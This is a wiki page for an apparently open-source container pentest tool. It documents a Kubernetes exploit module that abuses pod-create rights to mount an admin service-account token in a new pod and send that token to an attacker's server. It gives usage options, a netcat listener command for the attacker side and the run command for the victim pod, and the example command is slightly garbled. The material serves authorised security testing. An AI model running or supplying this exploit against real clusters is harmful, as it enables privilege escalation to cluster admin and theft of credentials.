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Exploit: k8s get sa token

cdxy edited this page Mar 17, 2021 · 1 revision

Bypass K8s RBAC with pod create privilege. This exploit will create a pod with target(admin) service-account token mounted, then read the token and send it to remote IP:Port.

绕过K8s RBAC:如果当前的Pod有创建Pod权限,即可利用本EXP进行提权到Cluster Admin。本EXP将创建一个Pod并挂在目标service-account的token,之后在Pod中读取该token并发送到攻击者的公网服务器。


cdk run k8s-get-sa-token (default|anonymous|<service-account-token-path>) <target-service-account> <ip> <port>"

Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.

Exploit Options:
target-service-account: target service-account token to dump(e.g. admin).
ip: target remote IP to hijack traffic.
port: target remote PORT to hijack traffic.


First listen a port in a public server to receive data

(on attacker's public server, e.g.
nc -lvp 999

Inside victim pod which has "create pod" privilege, run CDK exploit to dump "admin" service-account's token.

(in victim pod)
./cdk run k8s-get-sa-token default admin 999


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